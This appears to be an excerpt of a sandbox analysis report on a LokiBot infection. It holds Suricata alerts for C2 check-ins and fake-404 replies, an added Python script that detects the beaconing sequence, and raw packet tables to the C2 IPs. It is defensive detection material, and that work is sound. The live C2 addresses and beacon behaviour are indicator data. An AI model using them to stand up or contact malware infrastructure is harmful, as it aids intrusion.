                                                                    2024-11-20T07:58:14.313214+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924794.156.177.4180TCP
                                                                    2024-11-20T07:58:14.313214+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924794.156.177.4180TCP
                                                                    2024-11-20T07:58:14.318123+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249247TCP
                                                                    2024-11-20T07:58:14.448889+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924894.156.177.4180TCP
                                                                    2024-11-20T07:58:14.448889+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924894.156.177.4180TCP
                                                                    2024-11-20T07:58:14.448889+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924894.156.177.4180TCP
                                                                    2024-11-20T07:58:15.160454+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924894.156.177.4180TCP
                                                                    2024-11-20T07:58:15.160454+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924894.156.177.4180TCP
                                                                    2024-11-20T07:58:15.165411+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249248TCP
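The alert rows above repeat one LokiBot polling loop per client source port: the three check-in signatures fire on the bot's POST, the two "Request for C2 Commands" signatures fire next, and the server answers with the fake 404, roughly once a second on a fresh connection each time. The Python below is an added example and not part of the Joe Sandbox report: it takes a constructed subset of those rows (four connections, 49239 to 49242, copied from the table as tuples) and turns them into per-connection verdicts and a beacon interval. The grouping of SIDs into check-in, command-request and fake-404 phases is an assumption made here from the signature names, and the "lower port is the server" rule is a simplification that holds for this capture.

```python
"""Beacon-cadence triage over LokiBot Suricata alerts.

Added example, not part of the Joe Sandbox report. ALERTS is a constructed
subset (four client connections) copied from the alert table as
(timestamp, sid, src_ip, src_port, dst_ip, dst_port); the SID-to-phase
grouping is an assumption taken from the signature names.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Signature IDs as they appear in the table, grouped by the phase they mark.
SID_CHECKIN = {2021641, 2025381, 2825766}   # User-Agent (Charon/Inferno), Checkin, Checkin M2
SID_CMD_REQUEST = {2024313, 2024318}        # Request for C2 Commands M1 / M2
SID_FAKE_404 = 2025483                      # server's fake "404" reply to the bot

ALERTS = [  # constructed from the table: 49239..49242, client 192.168.2.22, C2 94.156.177.41:80
    ("2024-11-20T07:58:06.042036+0100", 2021641, "192.168.2.22", 49239, "94.156.177.41", 80),
    ("2024-11-20T07:58:06.042036+0100", 2025381, "192.168.2.22", 49239, "94.156.177.41", 80),
    ("2024-11-20T07:58:06.042036+0100", 2825766, "192.168.2.22", 49239, "94.156.177.41", 80),
    ("2024-11-20T07:58:06.878837+0100", 2024313, "192.168.2.22", 49239, "94.156.177.41", 80),
    ("2024-11-20T07:58:06.878837+0100", 2024318, "192.168.2.22", 49239, "94.156.177.41", 80),
    ("2024-11-20T07:58:06.884043+0100", 2025483, "94.156.177.41", 80, "192.168.2.22", 49239),
    ("2024-11-20T07:58:07.032370+0100", 2021641, "192.168.2.22", 49240, "94.156.177.41", 80),
    ("2024-11-20T07:58:07.032370+0100", 2025381, "192.168.2.22", 49240, "94.156.177.41", 80),
    ("2024-11-20T07:58:07.032370+0100", 2825766, "192.168.2.22", 49240, "94.156.177.41", 80),
    ("2024-11-20T07:58:07.903785+0100", 2024313, "192.168.2.22", 49240, "94.156.177.41", 80),
    ("2024-11-20T07:58:07.903785+0100", 2024318, "192.168.2.22", 49240, "94.156.177.41", 80),
    ("2024-11-20T07:58:07.913735+0100", 2025483, "94.156.177.41", 80, "192.168.2.22", 49240),
    ("2024-11-20T07:58:08.079653+0100", 2021641, "192.168.2.22", 49241, "94.156.177.41", 80),
    ("2024-11-20T07:58:08.079653+0100", 2025381, "192.168.2.22", 49241, "94.156.177.41", 80),
    ("2024-11-20T07:58:08.079653+0100", 2825766, "192.168.2.22", 49241, "94.156.177.41", 80),
    ("2024-11-20T07:58:08.914515+0100", 2024313, "192.168.2.22", 49241, "94.156.177.41", 80),
    ("2024-11-20T07:58:08.914515+0100", 2024318, "192.168.2.22", 49241, "94.156.177.41", 80),
    ("2024-11-20T07:58:08.919532+0100", 2025483, "94.156.177.41", 80, "192.168.2.22", 49241),
    ("2024-11-20T07:58:09.075720+0100", 2021641, "192.168.2.22", 49242, "94.156.177.41", 80),
    ("2024-11-20T07:58:09.075720+0100", 2025381, "192.168.2.22", 49242, "94.156.177.41", 80),
    ("2024-11-20T07:58:09.075720+0100", 2825766, "192.168.2.22", 49242, "94.156.177.41", 80),
    ("2024-11-20T07:58:09.790944+0100", 2024313, "192.168.2.22", 49242, "94.156.177.41", 80),
    ("2024-11-20T07:58:09.790944+0100", 2024318, "192.168.2.22", 49242, "94.156.177.41", 80),
    ("2024-11-20T07:58:09.795871+0100", 2025483, "94.156.177.41", 80, "192.168.2.22", 49242),
]


def parse_ts(ts):
    """Parse the report's ISO timestamp; %z accepts the '+0100' offset form."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def flow_key(src_ip, src_port, dst_ip, dst_port):
    """Canonical (client_ip, client_port, server_ip, server_port) so both directions
    of one TCP connection share a bucket; the lower port is assumed to be the server."""
    if src_port < dst_port:
        return (dst_ip, dst_port, src_ip, src_port)
    return (src_ip, src_port, dst_ip, dst_port)


def group_flows(alerts):
    """Map each connection to its time-ordered (ts, sid, from_server) events."""
    flows = defaultdict(list)
    for ts, sid, sip, sport, dip, dport in alerts:
        key = flow_key(sip, sport, dip, dport)
        from_server = (sip, sport) == (key[2], key[3])
        flows[key].append((parse_ts(ts), sid, from_server))
    for events in flows.values():
        events.sort()
    return flows


def is_lokibot_exchange(events):
    """True when a flow shows, in order: client check-in, client request for
    commands, then the server's fake 404. Out-of-order or partial flows fail."""
    phase = 0
    for _ts, sid, from_server in events:
        if phase == 0 and sid in SID_CHECKIN and not from_server:
            phase = 1
        elif phase == 1 and sid in SID_CMD_REQUEST and not from_server:
            phase = 2
        elif phase == 2 and sid == SID_FAKE_404 and from_server:
            return True
    return False


def triage(alerts):
    """Per client port: did that connection carry the full exchange?"""
    return {key[1]: is_lokibot_exchange(ev) for key, ev in group_flows(alerts).items()}


def beacon_interval(alerts):
    """Median seconds between the first alert of consecutive connections, i.e. the
    bot's polling cadence; None when fewer than two connections are present."""
    starts = sorted(ev[0][0] for ev in group_flows(alerts).values())
    gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
    return median(gaps) if gaps else None


def c2_endpoints(alerts):
    """Distinct (server_ip, server_port) pairs the host beaconed to."""
    return {(key[2], key[3]) for key in group_flows(alerts)}


if __name__ == "__main__":
    print(triage(ALERTS))
    print(f"beacon interval ~ {beacon_interval(ALERTS):.3f} s")
    print(c2_endpoints(ALERTS))
```

The phase machine is what separates a real LokiBot session from a stray User-Agent match: a connection that only triggers the check-in signature, or one where the fake 404 is missing because the C2 is already down, does not count, and the sub-second cadence across fresh ephemeral ports is the behaviour worth alerting on even when individual signatures are tuned out.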
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 07:56:31.421825886 CET | 49163 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:31.421879053 CET | 443 | 49163 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:31.421977043 CET | 49163 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:31.427613974 CET | 49163 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:31.427630901 CET | 443 | 49163 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:32.069742918 CET | 443 | 49163 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:32.069871902 CET | 49163 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:32.075449944 CET | 49163 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:32.075474024 CET | 443 | 49163 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:32.075764894 CET | 443 | 49163 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:32.075823069 CET | 49163 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:32.149152040 CET | 49163 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:32.195341110 CET | 443 | 49163 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:32.350197077 CET | 443 | 49163 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:32.350302935 CET | 443 | 49163 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:32.350403070 CET | 49163 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:32.350475073 CET | 49163 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:32.359553099 CET | 49163 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:32.359580994 CET | 443 | 49163 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:32.368149042 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.373701096 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.373811007 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.373878956 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.379159927 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.962903976 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.962941885 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.962970972 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.962980032 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.963004112 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.963009119 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.963027954 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.963042021 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.963052034 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.963052034 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.963052034 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.963061094 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.963062048 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.963073015 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.963093996 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.963094950 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.963100910 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.963129044 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.968157053 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.968189955 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.968208075 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.968230963 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.968242884 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:32.968250990 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:32.968278885 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.051387072 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.051404953 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.051420927 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.051431894 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.051440001 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.051465988 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.051467896 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.051467896 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.051501989 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.051628113 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.051645994 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.051660061 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.051668882 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.051672935 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.051682949 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.051698923 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.051706076 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.051723003 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.051728964 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.052428961 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.052472115 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.052509069 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.052522898 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.052537918 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.052558899 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.052571058 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.052963972 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.053005934 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.053040028 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.053050041 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.053066015 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.053076029 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.053076029 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.053097963 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.053107023 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.053869009 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.053880930 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.053895950 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.053917885 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.053920031 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.053920031 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.053946972 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.053977013 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.057435036 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.057455063 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.057487011 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.058116913 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.139914036 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.139940977 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.139966011 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.139976025 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.139990091 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140002012 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140007973 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140012026 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140007973 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140028000 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140041113 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140042067 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140042067 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140055895 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140064001 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140075922 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140089035 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140198946 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140234947 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140280008 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140290976 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140328884 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140341043 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140433073 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140444040 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140485048 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140485048 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140605927 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140616894 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140633106 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140645981 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140650034 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140660048 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140660048 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140676975 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140686035 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140691042 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140695095 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140711069 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140742064 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.140758991 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140769958 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140784979 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.140810966 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.141489029 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.141513109 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.141524076 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.141541004 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.141551018 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.141566992 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.141580105 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.141624928 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.141634941 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.141649961 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.141665936 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.141668081 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.141679049 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.141680956 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.141691923 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.141702890 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.141705036 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.141719103 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.141733885 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.359152079 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.359251976 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:33.811103106 CET | 80 | 49164 | 192.3.243.136 | 192.168.2.22
Nov 20, 2024 07:56:33.811208010 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:34.351767063 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:34.351809978 CET | 49164 | 80 | 192.168.2.22 | 192.3.243.136
Nov 20, 2024 07:56:34.388900042 CET | 49165 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:34.388932943 CET | 443 | 49165 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:34.388982058 CET | 49165 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:34.398787022 CET | 49165 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:34.398804903 CET | 443 | 49165 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:35.006823063 CET | 443 | 49165 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:35.006880999 CET | 49165 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:35.012293100 CET | 49165 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:35.012314081 CET | 443 | 49165 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:35.012593031 CET | 443 | 49165 | 198.244.140.41 | 192.168.2.22
Nov 20, 2024 07:56:35.012635946 CET | 49165 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:35.085285902 CET | 49165 | 443 | 192.168.2.22 | 198.244.140.41
Nov 20, 2024 07:56:35.127337933 CET | 443 | 49165 | 198.244.140.41 | 192.168.2.22
                                                                    Nov 20, 2024 07:56:35.285305023 CET44349165198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:35.285475016 CET44349165198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:35.285480022 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:35.285572052 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:35.286758900 CET49165443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:56:35.286787987 CET44349165198.244.140.41192.168.2.22
                                                                    Nov 20, 2024 07:56:35.296103954 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.301090002 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.301178932 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.301343918 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.306191921 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.879904032 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880012035 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880037069 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880048990 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880072117 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880080938 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880084038 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880099058 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880111933 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880119085 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880125999 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880141020 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880153894 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.880176067 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880176067 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880176067 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880176067 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.880192041 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.885080099 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.885117054 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.885158062 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.885215044 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.885215044 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.886173010 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.966939926 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.966962099 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.966984987 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.967063904 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.967123985 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.967134953 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.967175961 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.967176914 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.967187881 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.967204094 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.967206001 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.967216969 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.967230082 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.968079090 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.968091011 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.968106985 CET8049166192.3.243.136192.168.2.22
